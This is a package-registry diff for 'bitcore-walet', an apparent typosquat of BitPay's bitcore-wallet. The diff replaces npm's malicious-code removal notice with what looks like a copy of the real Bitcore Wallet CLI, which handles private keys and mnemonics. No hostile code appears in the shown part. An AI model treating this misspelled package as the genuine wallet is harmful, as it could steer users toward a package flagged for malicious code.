bitcore-walet 0.0.1-security → 8.19.0

package/LICENCE

@@ -0,0 +1,21 @@
+The MIT License
+
+Copyright (c) 2015 BitPay
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in
+all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
+THE SOFTWARE.

package/README.md

@@ -1,5 +1,137 @@
-# Security holding package
+# Bitcore Wallet
 
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
+[![NPM Package](https://img.shields.io/npm/v/bitcore-wallet.svg?style=flat-square)](https://www.npmjs.org/package/bitcore-wallet)
 
-Please refer to www.npmjs.com/advisories?search=bitcore-walet for more information.
+**A simple Command Line Interface Wallet using [Bitcore Wallet Service](https://github.com/bitpay/bitcore/tree/master/packages/bitcore-wallet-service) and its *official* client lib [Bitcore Wallet Client](https://github.com/bitpay/bitcore/tree/master/packages/bitcore-wallet-client).**
+
+This can be used to operate Bitcoin and Bitcoin Cash wallets.
+
+## Quick Guide
+
+```sh
+# Use -h or BWS_HOST to setup the BWS URL (defaults to localhost:3001)
+#
+# Start a local BWS instance be doing:
+# git clone https://github.com/bitpay/bitcore/tree/master/packages/bitcore-wallet-service.git bws
+# cd bws; npm install; npm start
+
+cd bin
+
+# Create a 2-of-2 wallet (~/.wallet.dat is the default filename where the wallet critical data will be stored)
+#
+# TIP: add -t for testnet, and -p to encrypt the credentials file
+wallet create 'my wallet' 2-2
+  * Secret to share:
+    JevjEwaaxW6gdAZjqgWcimL525DR8zQsAXf4cscWDa8u1qKTN5eFGSFssuSvT1WySu4YYLYMUPT
+
+# Check the status of your wallet
+wallet status
+
+  * Wallet my wallet [livenet]: 2-of-2 pending
+    Missing copayers: 1
+
+# Use -f or WALLET_FILE to setup the wallet data file
+
+# Join the wallet as another copayer (add -p to encrypt credentials file)
+wallet -f pete.dat join JevjEwaaxW6gdAZjqgWcimL525DR8zQsAXf4cscWDa8u1qKTN5eFGSFssuSvT1WySu4YYLYMUPT
+
+export WALLET_FILE=pete.dat
+wallet status
+
+# Generate addresses to receive money
+wallet address
+  * New Address 3xxxxxx
+
+# Check your balance
+wallet balance
+
+# Spend coins. Amount can be specified in btc, bit or sat (default)
+wallet send 1xxxxx 1000bit "1000 bits to mother"
+  * Tx created: ID 01425517364314b9ac6017-e97d-46d5-a12a-9d4e5550abef [pending]
+    RequiredSignatures: 2
+
+# You can use 1000bit or 0.0001btc or 100000sat. (Set BIT_UNIT to btc/sat/bit to select output unit).
+
+It is also possible to use Payment Protocol or BIP21. Examples:
+
+wallet send 'bitcoin:?r=https://bitpay.com/i/8rR7ydnLfQGqnRW1mqvXxJ'
+wallet send 'bitcoin:1N4zjmp1ojRborDiAu62MyCpaz9wjhPLM?amount=1'
+
+# List pending TX Proposals
+wallet txproposals
+  * TX Proposals:
+    abef ["1000 bits to mother" by pete] 1,000 bit => 1xxxxx
+      Missing signatures: 2
+
+# Sign or reject TXs from other copayers
+wallet -f pete.dat reject <id>
+wallet -f pete.dat sign <id>
+
+# List transaction history
+wallet history
+  a few minutes ago: => sent 1,000 bit ["1000 bits to mother" by pete] (1 confirmations)
+  a day ago: <= received 1,400 bit (48 confirmations)
+  a day ago: <= received 300 bit (62 confirmations)
+
+# List all commands:
+wallet --help
+```
+
+## Password protection
+
+It is possible (and recommeded) to encrypt the wallet's credentials (.dat file). this is done be adding the `-p` parameter to `join` or `create` or `genkey`. The password will be asked interactively. Following commands that use the crendetials will require the password to work.
+
+Password-based key derivation function 2 ([PBKDF2](https://en.wikipedia.org/wiki/PBKDF2)) is used to derive the key to encrypt the data. AES is used to do the actual encryption, using the implementation of [SJCL](https://bitwiseshiftleft.github.io/sjcl/).
+
+## Airgapped Operation
+
+Air gapped (non connected) devices are supported. This setup can be useful if maximum security is needed, to prevent private keys from being compromised. In this setup, a device is installed without network access, and transactions are signed off-line. Transactions can be pulled from BWS using a `proxy` device, then downloaded to a pendrive to be moved to the air-gapped device, signed there, and then moved back the `proxy` device to be sent back to BWS. Note that Private keys are generated off-line in the airgapped device.
+
+```sh
+# On the Air-gapped device
+
+# Generate extended private key (add -t for testnet)
+airgapped$ wallet genkey
+  * Livenet Extended Private Key Created.
+
+airgapped$ wallet export -o toproxy --nosign
+  * Wallet data saved at toproxy without signing capability.
+
+
+# On the proxy machine
+proxy$ wallet import toproxy
+  * Wallet Imported without signing capability.
+proxy$ wallet join <secret>    # Or wallet create 
+proxy$ wallet address
+proxy$ wallet balance
+
+# It is not possible to sign transactions from the proxy device
+proxy$ wallet sign
+  [Error: You do not have the required keys to sign transactions]
+
+# Export pending transaction to be signed offline
+proxy$ wallet txproposals -o txproposals.dat
+
+## Back to air-gapped device
+
+# Sign them
+airgapped$ wallet airsign txproposals.dat -o signatures.dat
+
+# NOTE: To allow the airgapped device to check the transaction proposals being signed, the public keys of the copayers will be imported from the txproposals archive. That information is exported automatically by the proxy machine, and encrypted using copayer's xpriv derivatives.
+
+## Back to proxy machine
+
+# Send signatures to BWS
+proxy$ wallet sign -i signatures.dat
+  Transaction 014255.... signed by you.
+```
+
+## Contributing
+
+See [CONTRIBUTING.md](https://github.com/bitpay/bitcore/blob/master/Contributing.md) on the main bitcore repo for information about how to contribute.
+
+## License
+
+Code released under [the MIT license](https://github.com/bitpay/bitcore/blob/master/LICENSE).
+
+Copyright 2013-2019 BitPay, Inc. Bitcore is a trademark maintained by BitPay, Inc.

package/bin/wallet

@@ -0,0 +1,31 @@
+#!/usr/bin/env node
+
+var program = require('commander');
+
+program
+  .version('0.0.7')
+  .command('create <walletName> <m-n> [username]', 'creates a wallet')
+  .command('join <secret> [username]', 'join a wallet')
+  .command('mnemonic', 'show mnemonics from my wallet')
+  .command('status', 'get wallet status')
+  .command('address', 'create a new address from server')
+  .command('addresses', 'list addresses')
+  .command('balance', 'wallet balance')
+  .command('send <address> <amount> [note]', 'send bitcoins')
+  .command('sign <txpId>', 'sign a transaction proposal')
+  .command('reject <txpId> [reason]', 'reject a transaction proposal')
+  .command('broadcast <txpId>', 'broadcast a transaction proposal to the Bitcoin network')
+  .command('rm <txpId>', 'remove a transaction proposal')
+  .command('history', 'list of past incoming and outgoing transactions')
+  .command('export', 'export wallet critical data')
+  .command('import <backup> <passphrase>', 'import wallet critical data')
+  .command('confirm', 'show copayer\'s data for confirmation')
+  .command('recreate', 'recreate a wallet on a remove server given local infomation')
+  .command('txproposals', 'list transactions proposals')
+  .command('genkey', 'generates extended private key for later wallet usage')
+  .command('airsign <file>', 'sign a list of transaction proposals from an air-gapped device')
+  .command('derive <path>', 'derive using the extended private key')
+  .parse(process.argv);
+
+if (!program.args.length || !program.runningCommand)
+  program.help();

package/bin/wallet-address

@@ -0,0 +1,19 @@
+#!/usr/bin/env node
+
+var program = require('commander');
+var utils = require('./cli-utils');
+program = utils.configureCommander(program);
+
+program
+  .parse(process.argv);
+
+var args = program.args;
+utils.getClient(program, {
+  mustExist: true
+}, function(client) {
+  client.createAddress({}, function(err, x) {
+    utils.die(err);
+
+    console.log('* New Address %s ', x.address);
+  });
+});

package/bin/wallet-addresses

@@ -0,0 +1,30 @@
+#!/usr/bin/env node
+
+var _ = require('lodash');
+var program = require('commander');
+var utils = require('./cli-utils');
+program = utils.configureCommander(program);
+
+program
+  .parse(process.argv);
+
+var args = program.args;
+
+utils.getClient(program, { mustExist: true }, function (client) {
+  
+  client.getMainAddresses({
+    doNotVerify: true
+  }, function(err, x) {
+
+    utils.die(err);
+
+    if (x.length > 0) {
+      console.log('* Addresses:');
+      _.each(x, function(a) {
+        console.log('      ', a.address);
+      });
+    } else {
+      console.log('* No addresses.');
+    }
+  });
+});

package/bin/wallet-airsign

@@ -0,0 +1,49 @@
+#!/usr/bin/env node
+
+var _ = require('lodash');
+var fs = require('fs');
+var program = require('commander');
+var utils = require('./cli-utils');
+program = utils.configureCommander(program);
+
+program
+  .usage('[options] <file>')
+  .option('-o, --output <filename>', 'write signatures to file')
+  .parse(process.argv);
+
+var args = program.args;
+if (!args[0])
+  program.help();
+
+var file = args[0];
+
+utils.getClient(program, { mustExist: true, doNotComplete: true }, function (client) {
+  var task = JSON.parse(fs.readFileSync(file));
+  var errors = [];
+  var signatures = _.map(task.txps, function (txp) {
+    try {
+      return {
+        txpId: txp.id,
+        signatures: client.signTxProposalFromAirGapped(txp, task.encryptedPkr, task.m, task.n),
+      };
+    } catch (ex) {
+      errors.push({
+        txp: txp,
+        error: ex
+      });
+    }
+  });
+  if (errors.length == 0) {
+    if (program.output) {
+      fs.writeFileSync(program.output, JSON.stringify(signatures));
+      console.log('Signatures written to file.');
+    } else {
+      console.log(JSON.stringify(signatures));
+    }
+  } else {
+    console.log('Error signing transactions:');
+    _.each(errors, function (e) {
+      console.log('\tTransaction %s: %s', e.txp.id, e.error.message);
+    });
+  }
+});

package/bin/wallet-balance

@@ -0,0 +1,29 @@
+#!/usr/bin/env node
+
+var program = require('commander');
+var utils = require('./cli-utils');
+program = utils.configureCommander(program);
+program
+  .option('-c, --coin <coin>', 'coin (btc/bch)')
+  .parse(process.argv);
+
+
+program.option = function(){};;
+
+var args = program.args;
+
+
+var opts = {};
+if (program.coin) { 
+    opts.coin = program.coin
+}
+
+utils.getClient(program, {
+  mustExist: true
+}, function(client) {
+  client.getBalance(opts, function(err, x) {
+    const coin  = client.credentials.coin;
+    utils.die(err);
+    console.log('* Wallet balance %s (Locked %s)', utils.renderAmount(x.totalAmount, coin), utils.renderAmount(x.lockedAmount, coin));
+  });
+});

package/bin/wallet-broadcast

@@ -0,0 +1,25 @@
+#!/usr/bin/env node
+
+var _ = require('lodash');
+var program = require('commander');
+var utils = require('./cli-utils');
+program = utils.configureCommander(program);
+
+program
+  .usage('[options] <txpid>')
+  .parse(process.argv);
+
+var args = program.args;
+var txpid = args[0] || '';
+
+utils.getClient(program, { mustExist: true }, function (client) {
+  client.getTxProposals({}, function(err, txps) {
+    utils.die(err);
+
+    var txp = utils.findOneTxProposal(txps, txpid);
+    client.broadcastTxProposal(txp, function(err, txp) {
+      utils.die(err);
+      console.log('Transaction Broadcasted: TXID: ' + txp.txid);
+    });
+  });
+});

package/bin/wallet-confirm

@@ -0,0 +1,34 @@
+#!/usr/bin/env node
+
+var _ = require('lodash');
+var program = require('commander');
+var utils = require('./cli-utils');
+program = utils.configureCommander(program);
+
+program
+  .parse(process.argv);
+
+utils.getClient(program, { mustExist: true }, function (client) {
+  client.getStatus({}, function(err, x) {
+    utils.die(err);
+
+    if (x.wallet.n == 1) {
+      console.log('Confirmations only work on shared wallets');
+      process.exit(1);
+    }
+    console.log('\n  To be sure that no copayer has joined this wallet more than once, you can asked them for their confirmation number. They can get theirs by running the bit-confirm command.');
+    console.log('\n * Copayer confirmation IDs:');
+
+    var myConfirmationId;
+    _.each(x.wallet.copayers, function(x) {
+      var confirmationId = utils.confirmationId(x);
+      if (x.id != client.credentials.copayerId)
+        console.log('\t\t* %s : %s', x.name, confirmationId);
+      else 
+        myConfirmationId = confirmationId;
+    });
+
+    console.log('\t\t---');
+    console.log('\t\tYour confirmation ID: %s', myConfirmationId);
+  });
+});

package/bin/wallet-create

@@ -0,0 +1,51 @@
+#!/usr/bin/env node
+
+var _ = require('lodash');
+var program = require('commander');
+var utils = require('./cli-utils');
+program = utils.configureCommander(program);
+
+program
+  .option('-t, --testnet', 'Create a Testnet Wallet')
+  .option('-p, --password', 'Encrypt wallet. Will ask password interactively')
+  .option('-c, --coin <coin>', 'coin (btc/bch)')
+  .usage('[options] <walletName> <m-n> [copayerName] <passphrase>')
+  .parse(process.argv);
+
+var args = program.args;
+if (!args[0])
+  program.help();
+
+var walletName = args[0];
+var copayerName = args[2] || process.env.USER;
+var passphrase = args[3];
+var network = program.testnet ? 'testnet' : 'livenet';
+var coin  = program.coin ? program.coin : 'btc';
+
+var mn;
+try {
+  mn = utils.parseMN(args[1]);
+} catch (ex) {
+  utils.die(ex);
+}
+
+utils.getClient(program, {
+  doNotComplete: true
+}, function(client) {
+
+  let {key, cred} = utils.create(client, { coin, network, account: 0, n: mn[1] });
+  client.createWallet(walletName, copayerName, mn[0], mn[1], {
+    network: network,
+    coin: coin,
+  }, function(err, secret) {
+    utils.die(err);
+    console.log(' * ' + _.capitalize(network) + ' Wallet Created.');
+    utils.saveClient(program, key, cred, {
+      doNotOverwrite: true
+    }, function() {
+      if (secret) {
+        console.log('   - Secret to share:\n\t' + secret);
+      }
+    });
+  });
+});

package/bin/wallet-derive

@@ -0,0 +1,41 @@
+#!/usr/bin/env node
+
+var program = require('commander');
+var utils = require('./cli-utils');
+var Bitcore = require('bitcore-wallet-client').Bitcore;
+
+program = utils.configureCommander(program);
+
+program
+  .usage('[options] <path>')
+  .description('Derive from an arbitrary path from a private key.');
+
+program.on('--help', function() {
+  console.log('  Examples:');
+  console.log('');
+  console.log('    $ wallet-derive "m/44\'/0\'/0\'"');
+  console.log('    $ wallet-derive "m/1/1"');
+  console.log('');
+});
+program.parse(process.argv);
+
+var args = program.args;
+if (!args[0])
+  program.help();
+
+var path = args[0];
+
+function getExtendedPublicKey(client, path) {
+  var xpriv = client.credentials.xPrivKey;
+  var derivedXPriv = new Bitcore.HDPrivateKey(xpriv).derive(path);
+  return derivedXPriv.hdPublicKey.toString();
+};
+
+utils.getClient(program, {
+  mustExist: true
+}, function(client) {
+  var xpub = getExtendedPublicKey(client, path);
+  var pub = new Bitcore.HDPublicKey(xpub).publicKey;
+  var address = pub.toAddress().toString();
+  console.log('Derived XPub:', xpub, '\nPublic key:', pub.toString(), '\nAddress:', address);
+});

package/bin/wallet-export

@@ -0,0 +1,50 @@
+#!/usr/bin/env node
+
+var program = require('commander');
+var qr = require('qr-image');
+var fs = require('fs');
+var _ = require('lodash');
+
+var utils = require('./cli-utils');
+program = utils.configureCommander(program);
+
+program
+  .option('-n, --nosign', 'export wallet credentials without transaction signing keys (extended private key)')
+  .option('-q, --qr', 'export a QR code')
+  .option('-e, --exportpassword <password>', 'a password to encrypt the exported data')
+  .option('-o, --output <filename>', 'output file');
+
+program
+  .parse(process.argv);
+
+var args = program.args;
+
+utils.getClient(program, { doNotComplete: true, mustExist: true }, function (client) {
+  var x;
+  try {
+    x = client.export({
+      compressed: !!program.qr,
+      noSign: !!program.nosign,
+      password: program.exportpassword,
+    });
+  } catch (ex) {
+    utils.die(ex);
+  }
+
+  var access = !!program.nosign ? 'without signing capability' : 'with signing capability';
+  if (program.qr) {
+    var filename = program.file + '.svg';
+    var qr_svg = qr.image(x, {
+      type: 'svg'
+    });
+    qr_svg.pipe(fs.createWriteStream(filename));
+    console.log('Wallet data: exported to %s %s.', filename, access);
+  } else {
+    if (program.output) {
+      fs.writeFileSync(program.output, x, { encoding: 'utf8' });
+      console.log('Wallet data saved at %s %s.', program.output, access);
+    } else {
+      console.log('Wallet data (%s).\n%s', access, x);
+    }
+  }
+});

package/bin/wallet-genkey

@@ -0,0 +1,24 @@
+#!/usr/bin/env node
+
+var _ = require('lodash');
+var program = require('commander');
+var fs = require('fs');
+var utils = require('./cli-utils');
+program = utils.configureCommander(program);
+
+program
+  .option('-t, --testnet', 'Create a Testnet Extended Private Key')
+  .option('-c, --coin <coin>', 'coin (btc/bch)')
+  .option('-p, --password', 'Encrypt wallet. Will ask password interactively')
+  .parse(process.argv);
+
+var args = program.args;
+var network = program.testnet ? 'testnet' : 'livenet';
+var coin = program.coin ? 'btc' : 'bch';
+utils.getClient(program, { doNotComplete: true, mustBeNew: true },  function (client) {
+  client.seedFromRandom({network:network, coin:coin});
+  utils.saveClient(program, client, function () {
+    console.log(' * ' + _.capitalize(network) + '/'  + coin + ' Extended Private Key Created.');
+    console.log('   To operate with the corresponding public keys from a proxy device, please run `wallet-export --nosign` and then on the proxy device `wallet-import`.');
+  });
+});

package/bin/wallet-history

@@ -0,0 +1,180 @@
+#!/usr/bin/env node
+
+var _ = require('lodash');
+var fs = require('fs');
+var moment = require('moment');
+var async = require('async');
+var program = require('commander');
+var utils = require('./cli-utils');
+program = utils.configureCommander(program);
+
+program
+  .option('-o, --output <file>', 'get JSON output in file')
+  .option('-l, --limit <n>', 'limit history to n transactions')
+  .option('-i, --info', 'get extra history info')
+  .option('-t, --format <json>', 'format csv / json')
+  .parse(process.argv);
+
+var args = program.args;
+
+var skip = 0, total = 0 ,
+  limit = program.limit, got, page = 1000;
+console.warn("* TX History:")
+
+let converter = JSON.stringify.bind();
+
+
+function formatDate(date) {
+  var dateObj = new Date(date);
+  if (!dateObj) {
+    this.logger.warn('Error formating a date');
+    return 'DateError';
+  }
+  if (!dateObj.toJSON()) {
+    return '';
+  }
+  return dateObj.toJSON();
+}
+
+
+
+if (program.format == 'csv') {
+  converter = function(txs) {
+
+    var ret = '';
+    var _amount, _note, _copayers, _creator, _comment;
+    var csvContent = [];
+
+    // from Copay
+    txs.forEach(it => {
+      var amount = it.amount;
+      if (it.action == 'moved') amount = 0;
+
+      _copayers = '';
+      _creator = '';
+
+      if (it.actions && it.actions.length > 1) {
+        for (var i = 0; i < it.actions.length; i++) {
+          _copayers +=
+          it.actions[i].copayerName + ':' + it.actions[i].type + ' - ';
+        }
+        _creator =
+        it.creatorName && it.creatorName != 'undefined'
+        ? it.creatorName
+        : '';
+      }
+      _amount = (it.action == 'sent' ? '-' : '') + (amount /1e8).toFixed(8);
+      _note = it.message || '';
+      _comment = it.note ? it.note.body : '';
+
+      if (it.action == 'moved')
+        _note += ' Moved:' + (it.amount /1e8).toFixed(8);
+
+      csvContent.push({
+        Date: formatDate(it.time * 1000),
+        Destination: it.addressTo || '',
+        Description: _note,
+        Amount: _amount,
+        Currency: this.currency,
+        Txid: it.txid,
+        Creator: _creator,
+        Copayers: _copayers,
+        Comment: _comment
+      });
+
+      if (it.fees && (it.action == 'moved' || it.action == 'sent')) {
+        var _fee = (it.fees / 1e8).toFixed(8);
+        csvContent.push({
+          Date: formatDate(it.time * 1000),
+          Destination: 'Bitcoin Network Fees',
+          Description: '',
+          Amount: '-' + _fee,
+          Currency: this.currency,
+          Txid: '',
+          Creator: '',
+          Copayers: ''
+        });
+      }
+
+    });
+
+    csvContent.forEach(it => {
+      ret = ret + `${it.Date},${it.Txid},${it.Destination},${it.Amount}` + "\n";
+    });
+    return ret;
+  };
+} else if (program.format == 'json') {
+} else if (program.format) { 
+  utils.die('Unknown format ' + program.format);
+}
+
+
+var allTxs=[];
+
+utils.getClient(program, { mustExist: true }, function (client) {
+ async.doWhilst(
+   function(cb) {
+     client.getTxHistory({
+       skip: skip,
+       limit: page+ 1,
+       includeExtendedInfo: program.info,
+     }, function(err, txs) {
+       if (err) return cb(err);
+
+       if (_.isEmpty(txs))
+        return;
+
+       got =  txs.length;
+       if (got > page) {
+         txs.pop();
+       }
+
+       if (program.output) {
+         allTxs = allTxs.concat(txs);
+         fs.writeFile(program.output,converter(allTxs), {
+           encoding: 'utf8'
+         }, function(err) {
+           if (err) console.error(err);
+           console.warn('Output file updated')
+         });
+       } else {
+         _.each(txs, function(tx) {
+           var time = moment(tx.time * 1000).fromNow();
+           var amount = utils.renderAmount(tx.amount);
+           var confirmations = tx.confirmations || 0;
+           var proposal = tx.proposalId ? '["' + tx.message + '" by ' + tx.creatorName + '] ' : '';
+           var direction;
+           switch (tx.action) {
+             case 'received':
+               direction = '<=';
+               break;
+             case 'moved':
+               direction = '==';
+               break;
+             case 'sent':
+               direction = '=>';
+               break;
+             default:
+               direction = tx.action;
+               break;
+           }
+           console.log("\t%s: %s %s %s %s(%s confirmations)", time, direction, tx.action, amount, proposal, confirmations);
+         });
+       }
+       return cb();
+     });
+   },
+   function() {
+     total = total + got;
+     var cont = got > page && (!limit || total < limit);
+     if (cont) {
+       skip+= page;
+       console.warn('* Skip:', skip);
+     }
+     return cont;
+   },
+   function (err) {
+     if (err) console.log(err);
+   }
+ );
+});

package/bin/wallet-import

@@ -0,0 +1,85 @@
+#!/usr/bin/env node
+
+var program = require('commander');
+var fs = require('fs');
+var sjcl = require('sjcl');
+var utils = require('./cli-utils');
+program = utils.configureCommander(program);
+
+program
+  .option('-c, --coin <coin>', 'coin (btc/bch)')
+  .option('-t, --testnet', 'testnet network')
+  .option('-i, --input', 'import from file')
+  .option('-q, --qr', 'import from a QR code')
+  .option('-e, --exportpassword <password>', 'a password to decrypt the data being imported')
+  .option('-k, --keypassword <password>', 'password to decrypt private key from imported file')
+  .option('-p, --password', 'Encrypt wallet. Will ask password interactively')
+  .usage('[options]  [<"backup-words"> <passphrase> | <filename> ] ')
+  .parse(process.argv);
+
+var args = program.args;
+
+if (!args[0])
+  program.help();
+
+utils.getClient(program, {
+  mustBeNew: true
+}, function(client) {
+
+  if (program.input) {
+    var file = args[0];
+    console.log("Importing from file:" + file);
+    var str;
+
+    try {
+      str = fs.readFileSync(file, {
+        encoding: 'utf8'
+      });
+    } catch (e) {
+      utils.die('Could not import: ' + e);
+    };
+    if (str.substr(0,6) == '{"iv":')  {
+      console.log('Backup is encrypted');
+      if (!program.exportpassword) 
+        utils.die('Provide export\'s password with -e ');
+      try {
+        str = sjcl.decrypt( program.exportpassword, str);
+      } catch (e) {
+        utils.die('Could not decrypt import: ' + e);
+      };
+    };
+
+    try {
+      client.import(str, {
+        compressed: !!program.qr,
+        password: program.keypassword,
+      });
+    } catch (ex) {
+      utils.die('Could not import. Check input file and password:' + ex.message);
+    }
+
+    utils.saveClient(program, client, function() {
+      var access = client.canSign() ? 'with signing capability' : 'without signing capability';
+      console.log('Wallet Imported ' + access + '.');
+    });
+  } else {
+    console.log("Importing from mnemonic");
+    var mnemonics = args[0];
+    var passphrase = args[1];
+    var network = program.testnet ? 'testnet' : 'livenet';
+    var coin  = program.coin ? program.coin : 'btc';
+    client.importFromMnemonic(mnemonics, {
+      network: network,
+      passphrase: passphrase,
+      coin: coin,
+    }, function(err) {
+      if (err)
+        utils.die('Could not import' + err);
+
+      utils.saveClient(program, client, function() {
+        var access = client.canSign() ? 'with signing capability' : 'without signing capability';
+        console.log('Wallet Imported ' + access + '.');
+      });
+    });
+  }
+});

package/bin/wallet-join

@@ -0,0 +1,25 @@
+#!/usr/bin/env node
+
+var program = require('commander');
+var utils = require('./cli-utils');
+program = utils.configureCommander(program);
+
+program
+  .usage('[options] <secret> [copayerName]')
+  .option('-p, --password', 'Encrypt wallet. Will ask password interactively')
+  .parse(process.argv);
+
+var args = program.args;
+if (!args[0])
+  program.help();
+
+var secret = args[0];
+var copayerName = args[1] || process.env.USER;
+
+utils.getClient(program, { doNotComplete: true }, function (client) {
+  client.joinWallet(secret, copayerName, {}, function(err, wallet) {
+    utils.die(err);
+    console.log(' * Wallet Joined.', wallet.name);
+    utils.saveClient(program, client, function () {});
+  });
+});

package/bin/wallet-mnemonic

@@ -0,0 +1,17 @@
+#!/usr/bin/env node
+
+var program = require('commander');
+var utils = require('./cli-utils');
+program = utils.configureCommander(program);
+
+program
+  .parse(process.argv);
+
+var args = program.args;
+
+utils.getClient(program, {
+  mustExist: true
+}, function(client) {
+  var mnemonic = client.getMnemonic();
+  console.log('* Wallet seed: %s', mnemonic);
+});

package/bin/wallet-recreate

@@ -0,0 +1,19 @@
+#!/usr/bin/env node
+
+var _ = require('lodash');
+var program = require('commander');
+var utils = require('./cli-utils');
+program = utils.configureCommander(program);
+
+program
+  .usage('[options]')
+  .description('Creates a wallet on the remote server given the local information')
+  .parse(process.argv);
+
+var args = program.args;
+utils.getClient(program, { mustExist: true }, function (client) {
+  client.recreateWallet(function(err) {
+    utils.die(err);
+    console.log(' *  Wallet created.');
+  });
+});

package/bin/wallet-reject

@@ -0,0 +1,29 @@
+#!/usr/bin/env node
+
+var _ = require('lodash');
+var program = require('commander');
+var utils = require('./cli-utils');
+program = utils.configureCommander(program);
+
+program
+  .usage('[options] <txpid> [reason]')
+  .parse(process.argv);
+
+var args = program.args;
+var txpid = args[0] || '';
+var reason = args[1] || '';
+
+utils.getClient(program, { mustExist: true }, function (client) {
+  client.getTxProposals({}, function(err, txps) {
+    utils.die(err);
+
+    var txp = utils.findOneTxProposal(txps, txpid);
+    client.rejectTxProposal(txp, reason, function(err, tx) {
+      utils.die(err);
+      if (tx.status == 'rejected')
+        console.log('Transaction finally rejected.');
+      else 
+        console.log('Transaction rejected by you.');
+    });
+  });
+});

package/bin/wallet-rm

@@ -0,0 +1,29 @@
+#!/usr/bin/env node
+
+var _ = require('lodash');
+var program = require('commander');
+var utils = require('./cli-utils');
+program = utils.configureCommander(program);
+
+program
+  .usage('[options] <txpid>')
+  .parse(process.argv);
+
+var args = program.args;
+var txpid = args[0] || '';
+
+utils.getClient(program, { mustExist: true }, function (client) {
+  client.getTxProposals({doNotVerify: true}, function(err, txps) {
+    utils.die(err);
+
+    if (program.verbose)
+      console.log('* Raw Server Response:\n', txps); //TODO
+
+    var txp = utils.findOneTxProposal(txps, txpid);
+    client.removeTxProposal(txp, function(err) {
+      utils.die(err);
+
+      console.log('Transaction removed.');
+    });
+  });
+});

package/bin/wallet-send

@@ -0,0 +1,142 @@
+#!/usr/bin/env node
+
+var program = require('commander');
+var utils = require('./cli-utils');
+var _ = require('lodash');
+var bwc = require('bitcore-wallet-client');
+var Bitcore_ = {
+  bch: bwc.BitcoreCash,
+  btc: bwc.Bitcore,
+};  
+
+program = utils.configureCommander(program);
+
+program
+  .option('--fee <fee-policy>', 'Fee policy to use (default "normal") [urgent, priority/normal/economy/superEconomy] ')
+  .usage('[options] <address> <amount> [note]')
+  .description('Create a proposal for sending bitcoins to a destination address.\n  The amount can be specified in bit, btc or sat (the default).');
+
+program.on('--help', function() {
+  console.log('  Examples:');
+  console.log('');
+  console.log('    $ wallet-send n2HRFgtoihgAhx1qAEXcdBMjoMvAx7AcDc 500bit');
+  console.log('    $ wallet-send mgWeRvUC6d1LRPKtdDbvYEpaUEmApS4XrY 0.2btc "dinner with friends"');
+  console.log('    $ wallet-send https://paypro.url/1234 # will ask for confirmation ');
+  console.log('');
+});
+program.parse(process.argv);
+
+var args = program.args;
+if (!args[0])
+  program.help();
+
+
+function confirmDiag(amountStr, note, cb) {
+  const readline = require('readline');
+
+  const rl = readline.createInterface({
+    input: process.stdin,
+    output: process.stdout
+  });
+
+  rl.question(`Confirm send ${amountStr} to ${note}? (y/N)`, (answer) => {
+    rl.close();
+    return cb(answer =='y');
+  });
+};
+
+
+function send(client, address, amount, fee, note, uri) { 
+  var amount;
+
+  fee = fee || 'normal';
+  client.createTxProposal({
+    outputs: [{
+      toAddress: address,
+      amount: amount,
+    }],
+    message: note,
+    feeLevel: fee,
+    payProUrl: uri,
+  }, function(err, txp) {
+    utils.die(err);
+    client.publishTxProposal({
+      txp: txp
+    }, function(err) {
+      utils.die(err);
+      console.log(' * Tx created: ID %s [%s] RequiredSignatures:',
+        utils.shortID(txp.id), txp.status, txp.requiredSignatures);
+    });
+  });
+};
+
+
+var arg1 = args[0];
+var uri;
+
+
+
+utils.getClient(program, {
+  mustExist: true
+}, function(client) {
+  var coin = client.credentials.coin;
+  var bitcore = Bitcore_[coin];
+
+  var uri, addr, amount, note;
+
+  // no backwards compat uri
+  if ((/^bitcoin(cash)?:\?r=[\w+]/).exec(arg1)) {
+    var coin2 = 'btc';
+    if (arg1.indexOf('bitcoincash') === 0) coin2 = 'bch';
+    if (coin != coin2) utils.die('Wallet / Payment Coin mismatch');
+    uri  = arg1.replace(/bitcoin(cash)?:\?r=/, '');
+
+  } else {
+
+    // BIP21
+    try { 
+
+      var parsed = new bitcore.URI(arg1);
+      if (!parsed.r) {
+
+        addr = parsed.address ? parsed.address.toString() : '';
+        note = parsed.message;
+        amount = parsed.amount ? parsed.amount : '';
+
+      } else {
+        uri = parsed.r;
+      }
+    } catch (e) {
+      uri = null;
+    }
+  }
+
+  //Send to URI or addr
+
+  if (uri) {
+    console.log('Fetching Payment from: ' + uri);
+    client.fetchPayPro({
+      payProUrl: uri,
+    }, function(err, paypro) {
+      if (err) {
+        utils.die(' Failed to fetch payment: ' + (_.isObject(err)? JSON.stringify(err) : err));
+      } else if (!paypro.verified) {
+        utils.die('Failed to verify payment protocol signatures');
+      }
+
+      var amountStr = utils.renderAmount(paypro.amount, coin);
+      confirmDiag(amountStr, paypro.memo, function(confirmed) {
+        if (!confirmed) utils.die('User canceled');
+        send(client, paypro.toAddress, paypro.amount, program.fee, paypro.memo, uri);
+      });
+    });
+  } else {
+
+    // Grab data from CLI if not set before
+    addr = addr || arg1;
+    amount = amount || utils.parseAmount(args[1]);
+    note = note ||  args[2];
+
+    send(client, addr, amount, program.fee, note);
+  }
+});

package/bin/wallet-sign

@@ -0,0 +1,29 @@
+#!/usr/bin/env node
+
+var _ = require('lodash');
+var fs = require('fs');
+var program = require('commander');
+var utils = require('./cli-utils');
+program = utils.configureCommander(program);
+
+program
+  .usage('[options] <txpid>')
+  .option('-i, --input [filename]', 'use signatures from file')
+  .parse(process.argv);
+
+var args = program.args;
+var txpid = args[0] || '';
+
